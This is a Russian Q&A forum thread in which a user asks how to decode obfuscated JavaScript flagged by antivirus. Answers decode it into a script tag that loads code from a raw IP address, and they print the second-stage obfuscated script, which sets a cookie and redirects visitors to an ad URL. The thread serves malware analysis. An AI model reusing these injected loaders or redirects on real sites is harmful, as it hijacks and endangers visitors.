Задать вопрос
Sc0undRel
@Sc0undRel
вирусы

Как расшифровать вирус?

Подскажите, есть ли какой декодер для этого?
Антивирус говорит, что здесь вирус - хочу убедиться.

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));
  • Вопрос задан
  • 864 просмотра
3 комментария
Подписаться 3 Простой 3 комментария
Решения вопроса 1
devalone
@devalone
̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻̻ 
document.write("<script src=\"http://134.249.116.78/jquery.js\"></script>");

А там для тебя ещё один квест:
//def
var _0x8290=["\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x63\x73\x72\x66\x5F\x75\x69\x64\x73","\x31","\x2F","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x70\x6D\x32\x30\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x6B\x65\x79\x3D\x37\x38\x39\x61\x34\x31\x32\x39\x65\x37\x38\x63\x30\x30\x30\x30\x38\x61\x34\x37\x62\x33\x36\x65\x32\x33\x64\x36\x35\x65\x61\x37"];function _mmm_(_0x1c98x2,_0x1c98x3,_0x1c98x4,_0x1c98x5){var _0x1c98x6= new Date();var _0x1c98x7= new Date();if(_0x1c98x4=== null|| _0x1c98x4=== 0){_0x1c98x4= 3};_0x1c98x7[_0x8290[1]](_0x1c98x6[_0x8290[0]]()+ 3600000* 24* _0x1c98x4);document[_0x8290[2]]= _0x1c98x2+ _0x8290[3]+ escape(_0x1c98x3)+ _0x8290[4]+ _0x1c98x7[_0x8290[5]]()+ ((_0x1c98x5)?_0x8290[6]+ _0x1c98x5:_0x8290[7])}function _nnn_(_0x1c98x9){var _0x1c98xa=document[_0x8290[2]][_0x8290[8]](_0x1c98x9+ _0x8290[3]);var _0x1c98xb=_0x1c98xa+ _0x1c98x9[_0x8290[9]]+ 1;if((!_0x1c98xa) && (_0x1c98x9!= document[_0x8290[2]][_0x8290[10]](0,_0x1c98x9[_0x8290[9]]))){return null};if(_0x1c98xa==  -1){return null};var _0x1c98xc=document[_0x8290[2]][_0x8290[8]](_0x8290[11],_0x1c98xb);if(_0x1c98xc==  -1){_0x1c98xc= document[_0x8290[2]][_0x8290[9]]};return unescape(document[_0x8290[2]][_0x8290[10]](_0x1c98xb,_0x1c98xc))}if(navigator[_0x8290[12]]){if(_nnn_(_0x8290[13])== 1){}else {_mmm_(_0x8290[13],_0x8290[14],_0x8290[14],_0x8290[15]);window[_0x8290[17]][_0x8290[16]]= _0x8290[18]}}


UPD: вот этот сайт неплохо помогает jsbeautifier.org

UPD2: он что-то делает с куками и редиректит сюда https://www.cpm20 com/watch?key=789a4129e78c00008a47b36e23d65ea7
Ответ написан
4 комментария
4 комментария
Пригласить эксперта
Ответы на вопрос 1
solotony
@solotony
покоряю пик Балмера
1) перекодировать хекс-коды
2) а дальше по-шагам подставлять значения массива в
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
Вакансии с Хабр Карьеры
Продакт дизайнер в финтех
Module Agency
от 110 000 до 190 000 ₽
Golang developer middle
Posman
До 200 000 ₽
PPC Team Lead Amazon (Senior)
GORA Group
от 2 500 $
Ещё вакансии
Заказы с Хабр Фриланса
Сделать тг бота для сбора 4 данных в эксель + проверка на подписку
26 апр. 2024, в 19:17
1000 руб./за проект
Написать видео сцену на unity с картой
26 апр. 2024, в 19:12
5000 руб./за проект
Написать программу на c# используя видео и карту
26 апр. 2024, в 19:10
5000 руб./за проект
Ещё заказы